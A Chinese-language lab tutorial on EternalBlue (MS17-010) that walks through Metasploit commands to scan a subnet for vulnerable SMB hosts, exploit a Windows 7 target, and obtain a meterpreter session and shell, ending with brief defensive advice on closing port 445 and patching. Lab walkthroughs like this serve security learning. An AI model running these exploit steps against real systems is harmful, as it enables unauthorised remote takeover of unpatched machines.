ms17-010永恒之蓝使用和防范（内附视频）

1.什么是永恒之蓝：

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。                                                                                                                                              ----百度百科

2.复刻：

工具：kali-linux 2022(攻击机)（IP:192.168.0,108）

           windows7 X64(靶机)（已经打开445端口）(IP:192.168.0.104)

           两系统在同一个网段

方法：

准备：

1.查找使用4444端口的程序

lsof -i:4444

2.杀掉使用4444端口的程序

kill -9 PID

 PID就是上面查找到的程序的编号，如果不把进程杀掉，后面会报错

1.加载工具

msfconsole

2.搜索攻击模块

search ms17-010

3.选择攻击模块(这个是搜索的)

use auxiliary/scanner/smb/smb_ms17_010

4.看一下要设置的参数

show options

5.设置IP(就是在这个网段下搜索有漏洞的IP)

set rhosts 192.168.0.1/24

 6.设置线程

set threads 50

7.开始搜索

run

 8.更换攻击模块

use windows/smb/ms17_010_eternalblue

9.查看要设置的参数

show options

10.设置IP

set rhosts 192.168.0.104(这就是填我们之前搜到的IP)

11.看一下可否攻击

check

12.开始攻击

run

这时候就攻击成功，然后我们就进到了meterpreter

1.屏幕截图

screenshot

2.进入shell

shell

 3.更改一下编码，要不然都是乱码

chcp 65001

后面的就简单了。

防范：1.开启防火墙，关闭445端口

           2.安装杀毒软件

           3.及时更新windows，微软在2017年发布了ms17-010的补丁